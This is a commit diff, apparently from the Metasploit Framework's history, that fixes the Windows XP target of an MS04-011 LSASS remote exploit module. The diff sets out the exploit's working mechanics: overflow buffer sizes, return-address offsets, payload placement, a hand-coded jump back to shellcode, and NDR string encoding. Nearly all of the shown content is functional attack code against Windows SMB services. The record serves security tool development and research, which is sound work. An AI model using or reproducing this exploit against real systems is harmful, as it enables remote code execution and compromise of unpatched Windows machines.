This fixes #44. The XP string was missing NDR encoding and null termination.

git-svn-id: file:///home/svn/framework3/trunk@4511 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-03-10 03:28:05 +00:00
parent 851328fbae
commit db198485a4
1 changed files with 10 additions and 5 deletions


@ -97,8 +97,9 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
# Check the remote OS name and version # Check the remote OS name and version
os = smb_peer_os os = smb_peer_os
string = '' buff = ''
case os case os
# Windows 2000 requires that the string be unicode formatted # Windows 2000 requires that the string be unicode formatted
# and give us a nice set of registers which point back to # and give us a nice set of registers which point back to
# the un-unicoded data. We simply return to a nop sled that # the un-unicoded data. We simply return to a nop sled that
@ -108,7 +109,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
str = rand_text_alphanumeric(3500) str = rand_text_alphanumeric(3500)
str[2020, 4] = [targets[1]['Rets'][0]].pack('V') str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
str[2104, payload.encoded.length ] = payload.encoded str[2104, payload.encoded.length ] = payload.encoded
string = NDR.UnicodeConformantVaryingString(str) buff = NDR.UnicodeConformantVaryingString(str)
# Windows XP is a bit different, we need to use an ascii # Windows XP is a bit different, we need to use an ascii
# buffer and a jmp esp. The esp register points to an # buffer and a jmp esp. The esp register points to an
# eight byte segment at the end of our buffer in memory, # eight byte segment at the end of our buffer in memory,
@ -116,17 +118,20 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
# buffer, giving us about 1936 bytes of space for a # buffer, giving us about 1936 bytes of space for a
# payload. # payload.
when /Windows 5\.1/ when /Windows 5\.1/
str = rand_text_alphanumeric(7000) str = rand_text_alphanumeric(7000) + "\x00\x00"
str[0, payload.encoded.length ] = payload.encoded str[0, payload.encoded.length ] = payload.encoded
str[1964, 4] = [targets[2]['Rets'][0]].pack('V') str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
string = str str[6998, 2] = "\x00\x00"
buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
# Unsupported target
else else
print_status("No target is available for #{ os }") print_status("No target is available for #{ os }")
return return
end end
stub = string + stub = buff +
NDR.long(rand(0xFFFFFF)) + NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') +